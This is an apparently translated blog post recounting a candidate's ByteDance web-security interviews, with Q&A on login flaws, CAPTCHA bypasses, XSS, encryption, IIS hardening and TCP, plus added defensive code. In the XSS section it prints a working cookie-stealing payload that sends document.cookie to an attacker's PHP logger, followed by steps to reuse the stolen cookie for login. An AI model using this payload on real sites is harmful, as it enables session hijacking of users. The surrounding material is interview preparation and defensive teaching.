Preface:

Some time ago, a friend of mine went out for interviews again. This time his targets were fairly clear: departments with large business volumes and relatively core business. After going back and forth through many companies, several of them big factories, he said the one that left the deepest impression on him was Byte.

After 3 rounds of technical interviews and 1 round of HR interviews, he finally got an offer of 40K * 18 salary.

The first round focused on the basics of Web security, while the second and third rounds focused on mastery of the corresponding penetration techniques and on understanding the business of his previous projects. He was impressed because each round lasted more than an hour and a half, and he really benefited a lot from them.

He chose Byte not only because it was a core project, but also because Byte is known for the best benefits in the industry and the highest salaries in its category.

“High salary, good development and excellent benefits” seems to have become a label for Bytedance.

And many people think the bar for Dachang is high:

“A double-non education can’t get you into a big factory!”

“Less than 3 years of work experience can’t get you into a big factory!”

“If you graduated from an unrelated major, you can’t get into a big factory!”

But for this friend of mine, a self-described “dregs” double-non graduate, getting into Byte did not seem so difficult. In his words, getting into Dachang depends on one thing: technical strength.

As long as you have good technical skills and perform well in the interview, you will get the Offer.

First round

1. What security problems can a login page have?

Weak passwords, brute-force cracking, SQL injection, sensitive information leakage

2. Which programming language are you most familiar with?

This is because we have only recently learned Python; although I learned some Java and C++ in the required courses, I feel I can’t speak about them confidently.

3. What have you done with Python?

Fortunately, I also wrote a simple POC in Python last month.

4. Which libraries are commonly used when writing a POC?

re (regular expression library), requests (network request library)

5. How to prevent brute-force cracking?

Limit the number of login attempts and add multi-factor authentication

6. What are the ways to bypass a CAPTCHA?

Bypass the CAPTCHA entirely: skip the captcha step and go directly to the desired page content.

The verification code is carried in the request header. On some sites the server-generated CAPTCHA is placed in the request header before the JS check runs, so the request header can be read and the CAPTCHA parsed out of it.

The session is not refreshed. On some websites, once a verification code has been validated, the requested resource can be accessed directly (the site forgets to refresh the cookie tied to that verification code). A cookie and verification code can therefore be prepared in advance and reused to access the site. For cases where multi-threading cannot be controlled, and for sites whose verification code expires when it is not accessed periodically, a scheduled access program can be added to solve the problem.

Use third-party plug-ins. On some sites the verification code is simple and contains only Arabic numerals and English letters, so it can be recognized by third-party plug-ins such as Tess4J or Tesseract.

Some sites draw their CAPTCHAs at random from a fixed library. For this type of static CAPTCHA, you can build your own static library that links each picture to its answer and identify codes by looking them up in that map.
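The two defender-side points above, limiting login attempts (question 5) and the "session is not refreshed" flaw (question 6), as an added example that is not from the original post: a login guard that locks an account after repeated failures and makes each CAPTCHA challenge single-use and time-limited. All names (LoginGuard, Session) and the sample user are constructed for this illustration.

```python
import hmac
import secrets
from dataclasses import dataclass, field

MAX_FAILURES = 5        # failed attempts allowed before the account is locked
LOCKOUT_SECONDS = 900   # lock duration, measured from the last failure
CAPTCHA_TTL = 120       # seconds a challenge stays valid

@dataclass
class Session:
    captcha_answer: str = ""    # kept server-side; never sent to the browser as text
    captcha_issued: float = 0.0

@dataclass
class LoginGuard:
    users: dict                                   # username -> password (constructed sample; real code stores hashes)
    failures: dict = field(default_factory=dict)  # username -> (count, last_failure_time)

    def issue_captcha(self, session: Session, now: float) -> str:
        # Bind a fresh 6-character challenge to this session (image rendering omitted)
        session.captcha_answer = secrets.token_hex(3).upper()
        session.captcha_issued = now
        return session.captcha_answer

    def _locked(self, username: str, now: float) -> bool:
        count, last = self.failures.get(username, (0, 0.0))
        if now - last >= LOCKOUT_SECONDS:
            self.failures.pop(username, None)     # lock and counter expire together
            return False
        return count >= MAX_FAILURES

    def login(self, session: Session, username: str, password: str, captcha: str, now: float) -> str:
        if self._locked(username, now):
            return "locked"
        answer, issued = session.captcha_answer, session.captcha_issued
        session.captcha_answer = ""   # consumed before checking: a replay finds nothing to match
        if not answer:
            return "captcha_missing"
        if now - issued > CAPTCHA_TTL:
            return "captcha_expired"
        if not hmac.compare_digest(captcha.upper().encode(), answer.encode()):
            self.failures[username] = (self.failures.get(username, (0, 0.0))[0] + 1, now)
            return "captcha_wrong"
        expected = self.users.get(username)
        if expected is None or not hmac.compare_digest(password.encode(), expected.encode()):
            # unknown users are counted too, so the response leaks no hint
            self.failures[username] = (self.failures.get(username, (0, 0.0))[0] + 1, now)
            return "bad_credentials"
        self.failures.pop(username, None)
        return "ok"
```

Every code path that reads the challenge clears it first, so a validated code cannot be replayed against a later request, and the lock is checked before any password comparison.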

7. What is the command to view the current directory in Windows?

dir

8. What is the command to view the current directory on Linux?

pwd

9. How to view the information and permissions of the current files?

ls -al

10. What were you responsible for in CTF?

I work in support…

11. Do you solve CTF problems independently?

Of course.

To say the least, even if you don’t go to Dachang, if you want to go further on the road of technology, become a technical leader and scale up systems, you must understand the fundamentals.

In penetration testing, port scanning, vulnerability scanning, intrusion detection, red team attack, blue team defense and so on are all built on network protocols, so learning the fundamentals is very important for penetration testers and a necessary skill for becoming a Daniu (expert).

Out of 10 programmers, all 10 will say they have learned about network security, and 9 will say they understand it. But in an actual interview, only two or three can answer relevant questions, such as:

“What’s the difference between TCP and UDP?” “What is the underlying principle of the HTTPS protocol?” “What transport and serialization protocols does Ali’s Dubbo framework use?”

Can you answer them? In fact, anyone who has been through interviews knows that whether it is a domestic Internet giant or a Silicon Valley IT company, the interview will ask about fundamentals.

This is not difficult to understand: the major companies pay close attention to programmers’ basic skills, and almost every program involves network protocols, so a mistake there can easily have disastrous consequences.

Here’s an example:

Many people are plagued by “technology changes too fast and becomes obsolete”: from search engines, big data and cloud computing to artificial intelligence, blockchain and so on. In fact, a lot of technology looks spectacular but, stripped down, rests on the basics and core concepts of “computer composition principles, operating systems, network protocols, data structures and algorithms.”

The way to avoid being eliminated by each new wave of technology is to master the core essential knowledge. It is not like “Master MySQL in X days” material, which may help you get a job more easily; this knowledge is still valuable when you’re 40 years old.


Second and third rounds

What is the penetration test process?

The pre-engagement interaction stage, the intelligence gathering stage, the threat modeling stage, the vulnerability analysis stage, the exploitation stage, the post-exploitation stage (how to keep control and maintain access), and the reporting stage.

Before the attack: network footprinting, network scanning, network enumeration

During the attack: use the vulnerability information to carry out the exploitation and obtain privileges

After the attack: post-exploitation to maintain access, file copying, Trojan implantation, trace erasure

How to defend against XSS?

1. Filter and encode front-end input: for example, only allow specified types of characters, such as a telephone number format or restrictions on registered user names. Input checks must be completed on the server side, because limits enforced only on the front end are easy to bypass; filter and escape special characters;

2. Filter and encode the output: encode and escape variable values when they are output into the front-end HTML;

3. Set HttpOnly on key cookies

Symmetric encryption vs. asymmetric encryption?

Symmetric encryption: encryption and decryption use the same key; key management is complex (n(n-1)/2 keys for n parties); the key is not suitable for transmission over the Internet; encryption and decryption are efficient. Used to encrypt data.

Asymmetric encryption: the private key cannot be derived from the public key, and each user can have an asymmetric key pair. The public key is suitable for transmission over the Internet, but encryption is inefficient, so it is applied to digital signatures and encryption.

Where are cookies stored? Can they be opened?

C:\Users\<User>\AppData\Microsoft\Windows\Cookies. Go to Tools – Folder Options – View, clear the check box that hides protected system files, and you will see the Cookies folder.

How does XSS steal cookies?

Attacker-side code (cookie.php):

```php
<?php
$cookie = $_GET['cookie'];
$time = date('Y-m-d g:i:s');
$referer = getenv('HTTP_REFERER');
$cookietxt = fopen('cookie.txt', 'a');
// Pay attention to the double quotation marks here, it is easy to make mistakes
fwrite($cookietxt, "time:" . $time . " cookie:" . $cookie . " referer:" . $referer . "\n");
fclose($cookietxt);
?>
```

Script side (injected into the vulnerable page):

```html
<script>
document.write('<img src="http://ip/cookie.php?cookie=' + document.cookie + '" width=0 height=0 border=0 />');
</script>
```

After obtaining the cookie, use Firebug to find the cookie, create a new cookie with the stolen value, submit it with the Referer, and you can log in directly without entering an account or password!
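The defences listed under “How to defend against XSS?” applied to the cookie-stealing snippet above, as an added example that is not from the original post: output encoding for the HTML body, a scheme check for links (where escaping alone is not enough), and a session cookie set with HttpOnly so document.cookie cannot read it. The PAYLOAD sample and the function names are constructed for this illustration.

```python
import html
from http.cookies import SimpleCookie
from urllib.parse import urlsplit

# Constructed sample input: the cookie-stealing snippet from this page, submitted as a "comment"
PAYLOAD = ("<script>document.write('<img src=\"http://ip/cookie.php?cookie='"
           "+document.cookie+'\" />');</script>")

def render_comment_unsafe(text: str) -> str:
    # Vulnerable: user input is concatenated straight into HTML, so the <script> executes
    return '<p class="comment">' + text + '</p>'

def render_comment_safe(text: str) -> str:
    # Encoded on output: <, >, &, quotes become entities, so the browser shows the text literally
    return '<p class="comment">' + html.escape(text, quote=True) + '</p>'

def render_link_safe(url: str, label: str) -> str:
    # Escaping alone does not help inside href: "javascript:alert(1)" is harmless as text
    # but runs as a URL. Allow only absolute http/https URLs, then escape for the attribute.
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        url = "#"
    return '<a href="%s">%s</a>' % (html.escape(url, quote=True), html.escape(label, quote=True))

def session_cookie_header(session_id: str) -> str:
    # HttpOnly keeps the cookie out of document.cookie, so the payload above cannot read it;
    # Secure and SameSite limit where the cookie is sent.
    c = SimpleCookie()
    c["session"] = session_id
    c["session"]["httponly"] = True
    c["session"]["secure"] = True
    c["session"]["samesite"] = "Lax"
    c["session"]["path"] = "/"
    return c.output(header="Set-Cookie:")
```

HttpOnly does not stop the script from running, only from reading the cookie; the output encoding is what prevents the injection in the first place.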

What should be done to protect an IIS server?

  1. Keep Windows updated
  2. Use IIS hardening tools
  3. Remove the default Web site
  4. If you do not need the FTP and SMTP services, uninstall them
  5. Regularly check your admin groups and services
  6. Strictly control write access to the server
  7. Set complex passwords
  8. Reduce or remove shares on the Web server
  9. Disable NetBIOS over TCP/IP
  10. Block unneeded TCP ports
  11. Carefully check .bat and .exe files: search for *.bat once a week
  12. Manage IIS directory security
  13. Use NTFS securely
  14. Manage user accounts
  15. Audit your Web server



TCP handshake protocol:

In the TCP/IP protocol suite, TCP provides a reliable connection service and uses a three-way handshake to establish a connection.

First handshake: when establishing the connection, the client sends a SYN packet (SEQ = J) to the server, enters the SYN_SENT state and waits for the server to confirm;

Second handshake: the server receives the SYN packet and must acknowledge the client’s SYN (ACK = J + 1); at the same time it sends its own SYN packet (SEQ = K), i.e. SYN+ACK, and enters the SYN_RECV state.

Third handshake: the client receives the server’s SYN+ACK packet and sends an acknowledgement packet ACK (ACK = K + 1) to the server. After this packet is sent, both the client and the server enter the ESTABLISHED state, completing the three-way handshake.
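The three-way handshake above as an added example (not from the original post): a minimal state machine with the page’s J and K sequence numbers, in which each side only advances its state when the acknowledgement number is exactly what it expects, so a stray or mis-numbered ACK is ignored. The Segment, Client and Server names are constructed for this illustration.

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class Segment:
    syn: bool
    ack: bool
    seq: int        # sequence number (J for the client, K for the server)
    ack_num: int    # acknowledgement number, only meaningful when ack is True

class Client:
    def __init__(self, isn: int):
        self.isn = isn           # J
        self.state = "CLOSED"

    def connect(self) -> Segment:
        # First handshake: SYN with SEQ = J
        self.state = "SYN_SENT"
        return Segment(syn=True, ack=False, seq=self.isn, ack_num=0)

    def receive(self, s: Segment) -> Optional[Segment]:
        # Third handshake: accept SYN+ACK only if it acknowledges J + 1, then reply ACK = K + 1
        if self.state == "SYN_SENT" and s.syn and s.ack and s.ack_num == self.isn + 1:
            self.state = "ESTABLISHED"
            return Segment(syn=False, ack=True, seq=self.isn + 1, ack_num=s.seq + 1)
        return None

class Server:
    def __init__(self, isn: int):
        self.isn = isn           # K
        self.state = "LISTEN"
        self.peer_seq = None

    def receive(self, s: Segment) -> Optional[Segment]:
        if self.state == "LISTEN" and s.syn and not s.ack:
            # Second handshake: SYN+ACK with SEQ = K and ACK = J + 1
            self.peer_seq = s.seq
            self.state = "SYN_RECV"
            return Segment(syn=True, ack=True, seq=self.isn, ack_num=s.seq + 1)
        final_ack = s.ack and not s.syn and s.ack_num == self.isn + 1 and s.seq == self.peer_seq + 1
        if self.state == "SYN_RECV" and final_ack:
            self.state = "ESTABLISHED"
        return None   # any other segment is ignored and the state does not change

def handshake(j: int, k: int):
    # Run the full exchange and report both end states plus the two acknowledgement numbers
    client, server = Client(j), Server(k)
    syn_ack = server.receive(client.connect())
    ack = client.receive(syn_ack)
    server.receive(ack)
    return client.state, server.state, syn_ack.ack_num, ack.ack_num
```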

How is DVWA built?

Start XAMPP (XAMPP (Apache + MySQL + PHP + Perl) is a powerful integrated web-building package). With Apache as the middleware and MySQL running, put DVWA in XAMPP’s htdocs directory, then enter http://127.0.0.1/dvwa in the browser and it can be used.

And the OWASP vulnerability practice platform: https://sourceforge.net/proje…

With XSS, is a cookie alone enough to log in without the username and password?

Pretty much. If you give the browser the cookie value, the browser will request the page using the cookie it already has, and if the cookie is valid, it will go straight to the page.

HR round

1. Later career development plans

2. When are you prepared to make a functional change?

3. How is the value of security services for customers reflected, and what problems do they help customers solve?

4. Penetration testing and code audit at work

Elementary – vulnerability scanning

Intermediate – Independent penetration test capability

Advanced – Code audit projects

Learning roadmap

Interview experience notes

Penetration toolkit

Network security books from introduction to advanced (HD PDF version)

SRC Vulnerability Summary

Web security learning video

Emergency Response Notes

[Data Collection]